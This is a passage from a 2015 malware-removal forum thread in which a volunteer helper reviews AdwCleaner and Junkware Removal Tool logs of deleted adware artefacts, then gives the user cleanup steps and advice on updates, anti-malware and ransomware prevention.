[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_13441
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_13733
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_13858
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_14024
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_14033
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_1426
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_14267
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_14460
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_1456
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_14980
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_15692
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_1571
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_15857
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_15864
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_15952
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_16330
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_1635
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_1658
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_16594
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_16675
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_1672
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_16943
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_17021
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_17033
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_17113
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_17119
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_17154
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_17170
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_17224
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_17635
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_17710
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_17988
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_18195
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_1917
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_19331
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_19538
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_19550
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_19605
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_19742
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_1986
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_20165
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_20658
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_20663
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_21056
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_21272
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_21312
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_21492
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_21665
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_21715
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_22026
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_2211
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_22288
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_22558
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_22634
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_22858
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_23119
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_23451
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_23539
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_23561
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_23615
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_23678
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_23838
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_24062
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_24078
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_242
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_24501
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_24527
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_24701
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_24883
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_25285
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_2553
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_25901
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_26121
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_26388
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_26390
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_26511
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_26666
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_26805
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_27058
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_27191
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_27351
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_27598
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_2811
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_28216
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_28229
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_28375
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_2861
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_28781
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_28955
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_29183
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_29196
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_29442
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_29522
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_29530
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_2958
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_29657
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_29912
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_30213
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_30377
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_305
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_30665
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_30712
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_30726
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_31043
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_31215
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_31390
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_31512
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_31683
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_31733
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_31738
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_31870
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_32253
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_32293
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_32505
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_32631
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_3563
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_3572
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_3662
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_3714
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_3819
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_4092
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_415
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_4251
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_431
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_4379
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_4514
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_5133
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_5363
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_5714
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_5822
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_5953
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_614
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_640
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_6520
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_6783
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_6917
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_7143
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_7253
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_739
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_7502
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_7509
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_7622
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_7959
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_8265
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_8920
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_9110
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_9219
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_9370
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_9961
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Roaming\Nosibay
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Roaming\ParetoLogic
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Roaming\Store
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Roaming\TWV
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Roaming\RunDir
***** [ Files ] *****
[-] File Deleted : C:\END
[-] File Deleted : C:\Program Files (x86)\Mozilla Firefox\browser\searchplugins\yahoo.xml
[-] File Deleted : C:\Users\PimpSlap\AppData\Roaming\Bubble Dock.boostrap.log
[-] File Deleted : C:\Users\PimpSlap\AppData\Roaming\Bubble Dock.installation.log
[-] File Deleted : C:\Users\PimpSlap\AppData\Roaming\Selection Tools.installation.log
[-] File Deleted : C:\Users\PimpSlap\AppData\Roaming\WindApp.boostrap.log
[-] File Deleted : C:\Users\PimpSlap\AppData\Roaming\WindApp.installation.log
[-] File Deleted : C:\Users\PimpSlap\AppData\Roaming\Mozilla\Firefox\Profiles\7ugsozrc.default\invalidprefs.js
[-] File Deleted : C:\Users\PimpSlap\AppData\Roaming\Mozilla\Firefox\Profiles\7ugsozrc.default\searchplugins\bingp.xml
[-] File Deleted : C:\Users\PimpSlap\AppData\Roaming\Mozilla\Firefox\Profiles\7ugsozrc.default\searchplugins\smod.xml
[-] File Deleted : C:\WINDOWS\SysNative\drivers\swdumon.sys
***** [ DLLs ] *****
***** [ Shortcuts ] *****
***** [ Scheduled tasks ] *****
[-] Task Deleted : paretologic registration3
[-] Task Deleted : paretologic update version3
[-] Task Deleted : ParetoLogic Update Version3_triggeronce
***** [ Registry ] *****
[-] Key Deleted : HKLM\SOFTWARE\Classes\uus3url-pl
[-] Key Deleted : HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application\NetTcpHandler
[-] Key Deleted : HKCU\Software\Classes\CLSID\{17EF1FFB-0545-4C9A-BE64-78FF53338475}
[-] Key Deleted : HKCU\Software\Nosibay
[-] Key Deleted : HKCU\Software\ParetoLogic
[-] Key Deleted : HKCU\Software\Store
[-] Key Deleted : HKCU\Software\WTools
[-] Key Deleted : HKCU\Software\Probit Software
[-] Key Deleted : HKCU\Software\SlimWare Utilities Inc
[-] Key Deleted : HKCU\Software\__SP__browser_name__SP__
[-] Key Deleted : HKLM\SOFTWARE\ParetoLogic
[-] Key Deleted : HKLM\SOFTWARE\SlimWare Utilities Inc
[-] Key Deleted : HKLM\SOFTWARE\SLIMWARE UTILITIES, INC.
[-] Key Deleted : HKLM\SOFTWARE\NetTcpHandler
[-] Key Deleted : HKLM\SOFTWARE\NtSvcHandler
[-] Key Deleted : HKLM\SOFTWARE\EasyDriverPro
[-] Key Deleted : [x64] HKLM\SOFTWARE\BrowserAir
[-] Key Deleted : [x64] HKLM\SOFTWARE\SmartPCFixer
[-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}
***** [ Web browsers ] *****
[-] [C:\Users\PimpSlap\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Deleted : fcfenmboojpjinhpgggodefccipikbpd
[-] [C:\Users\PimpSlap\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Deleted : jlcgehabolcakkjhgmgpkagpolbjlhfa
[-] [C:\Users\PimpSlap\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Homepage] Deleted : hxxp://www-searching.com/?pid=s&s=FB1zamobl03687,6948c77b-0cfd-43cf-98e1-8e5b9952202f&vp=ch&prd=set
*************************
:: "Tracing" keys removed
:: Winsock settings cleared
########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt - [17431 bytes] ##########
#10
Posted 10 December 2015 - 10:22 PM
jake1master
- Topic Starter
-
- Member
-
- 10 posts
Member
Great! Everything seems to running smoothly, anything else that you see that needs to be removed?
#11
Posted 11 December 2015 - 07:09 AM
BrianDrab
-
- Malware Removal
-
- 3,591 posts
Trusted Helper
A couple things to address. Please do the following.
Step#1 - JRT by Malwarebytes
1. Download Junkware Removal Tool to your desktop.
2. Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
3. The tool will open. Press any key at the Disclaimer screen and the program will start scanning your system.
4. Please be patient as this can take a while to complete depending on your system's specifications.
5. On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
6. Close the text file and reboot your machine.
7. Post the contents of JRT.txt into your next message.
Step#2 - Keeping Java Updated
WARNING: Java is one of the most exploited programs at this time. The Department of Homeland Security recommends that computer users disable Java. You can read more about this here.
I would recommend that you completely uninstall Java unless you need it to run an important software. If you need it or are unsure or uncomfortable with removing it then I would recommend that you disable Java in your browsers until you need it and then enable it at that time. (See How to disable Java in your web browser and How to unplug Java from the browser). If you don't uninstall it, it's also important that you follow the directions below to update to the latest version of Java.
Note: If you don't use Java or don't know if you need it I would uninstall it.
If you wish to keep it please follow the instructions below to update to the newest version.
1. Click the Start button
2. Type Java
3. Click on Configure Java in the search results
4. Click the Update tab
5. Click the Update Now button and allow the update to download/install.
#12
Posted 11 December 2015 - 05:12 PM
jake1master
- Topic Starter
-
- Member
-
- 10 posts
Member
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.0.1 (11.24.2015)
Operating System: Windows 10 Pro x64
Ran by PimpSlap (Administrator) on Fri 12/11/2015 at 15:06:37.93
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
File System: 5
Successfully deleted: C:\Users\PimpSlap\AppData\Local\crashrpt (Folder)
Successfully deleted: C:\Users\PimpSlap\AppData\Local\installer (Folder)
Successfully deleted: C:\Users\PimpSlap\Documents\propccleaner (Folder)
Successfully deleted: C:\WINDOWS\system32\Tasks\RegCure Pro Startup (Task)
Successfully deleted: C:\WINDOWS\Tasks\RegCure Pro Startup.job (Task)
Registry: 2
Successfully deleted: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\\GoogleChromeAutoLaunch_F884F1D7BC4601607AB3C7CEE5F5A322 (Registry Value)
Successfully deleted: HKLM\Software\Microsoft\Internet Explorer\Main\\SearchAssistant (Registry Value)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Fri 12/11/2015 at 15:11:43.38
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#13
Posted 11 December 2015 - 08:26 PM
BrianDrab
-
- Malware Removal
-
- 3,591 posts
Trusted Helper
Perfect. Before we clean up our tools, can you provide me one more file? Please follow the instructions below.
Retrieve NTUser.dat from FRST Original Restore Point
1. Download ShadowExplorer and save to your desktop.
2. On your desktop their will be a file named ShadowExplorer-0.9-portable.zip. Right-click on this file and choose Extract All...
3. Ensure "Show extracted files when complete" is checked and click the Extract button.
4. A folder will open and you will see another folder named ShadowExplorerPortable-0.9
5. Double-click to open this folder and you will see up to four files. One of them is named ShadowExplorerPortable.exe.
6. Double-click this executable to open the program. Answer Yes to the UAC prompt if it comes up.
7. Please ensure that you pick your C: drive from the 1st drop down and then pick the appropriate date/time from the 2nd drop-down. You are looking for one that will be 12/10/2015 at around 7:30PM.
8. Then expand the C:\ drive by clicking the plus sign next to it. Scroll down to find the Users folder and expand this.
9. Then directly click on the PimpSlap folder (no need to expand it).
10. Locate the file named NTUSER.DAT and right-click on this file. Select Export...
11. Select Desktop and click OK.
12. You may close ShadowExplorer now.
13. On your desktop, you will now have a file named NTUSER.DAT. Can you zip this and upload to SendSpace and provide the link?
Note: If you are not currently showing system files you will not see NTUSER.DAT on your desktop. It is there, just hidden. You can either uncheck "Hide protected operating system files (Recommended)" from Folder Options if you know how or simply do the following.
Right-click your Start button and choose Run. In the run dialog, please copy/paste the following intot he Open text box and click OK. You will then see the NTUSER.DAT file.
attrib -s -h %userprofile%\desktop\ntuser.dat
#14
Posted 11 December 2015 - 08:35 PM
jake1master
- Topic Starter
-
- Member
-
- 10 posts
Member
I clicked C: under the first drop down and there are no files or dates listed. There are files and dates for both the J: and the F: drives though. What should I do?
#15
Posted 11 December 2015 - 09:14 PM
BrianDrab
-
- Malware Removal
-
- 3,591 posts
Trusted Helper
OK, no worries. It wasn't critical. As you are clean I will leave you with the following.
OK! Well done, your computer is clean again! 
Part of our jobs here is to help you clean your computer. But beyond that and just as important is to provide you with some information to keep you safe and secure on the net as well as to share knowledge. Following is that information.
1. Clean Up!
We need to remove all the tools that we used so that should you ever be re-infected, you will download updated versions which may have updated detection logic.
1. Download Delfix from here.
2. Ensure everything is checked.
3. Click Run.
Note: The program will run for a few moments and then notepad will open with a log. Please paste the log in your next reply.
Note: Delete any other .bat, .log, .reg, .txt, and any other files created during this process, and left on the desktop and empty the Recycle Bin.
2. Keeping Programs Updated
You need to ensure that any programs installed on your machine are kept current. The bad guys exploit vulnerabilities that are found in older versions of software. A very good piece of software that keeps your programs up-to-date is Secunia Personal Software Inspector (PSI). You can download and install it from here. You can read more information about this free software as well as a video walkthrough from here.
3. Antimalware- Preventative
Note: Malwarebytes is a fantastic piece of software. Malwarebytes is an anti-malware software and not an antivirus software so it won't conflict with the Antivirus that you are running. I would recommend that you open up this program, allow it to update and scan your machine at least quarterly...monthly if you can.
4. Crypto Warning!!!! - Complete Data Loss can occur!
There are particularly nasty infections out there at the moment that encrypt your data and hold it for ransom. You may read more about this here.
- Download CryptoPrevent free for home use here following the instructions below.
- Save the file to your desktop from the link above and then open the program by clicking Run when prompted from your browser or by going to the desktop where the file was saved and double-clicking.
- Accept all the defaults during the install. The last screen of the install has a checkmark in "Launch CryptoPrevent". This is good and will launch the program once you click Finish.
- You will get a prompt asking if you purchased a Product Key for Automatic Updates. You can answer No.
- You will then be prompted to learn more about automatic updates or if you want to purchase a key. This is up to you but you don't have to.
- You will be prompted to click OK to continue and select your protection level. Go ahead and click OK.
- Click the Apply button to set Default protection.
- You may get a message stating that Windows Sidebar and Desktop Gadgets are a major security vulnerability and asking you if you want to disable them. If you don't use these features, answer Yes.
- That's it. The protection is in place.
Note: The free version doesn't provide automatic updates. Periodically, you should open up the program (there is a shortcut on your desktop now) and select the Updates! menu....and select Check for Updates to see if there are any as this infection has serious consequences.
For more information about computer security and how to protect yourself when on the internet, please read this guide Best Practices for Safe Computing
OK, all the best, and stay safe!
Items for your next post
1. Contents of the delfix log
Similar Topics
0 user(s) are reading this topic
0 members, 0 guests, 0 anonymous users
As Featured On:
Sign In
Create Account
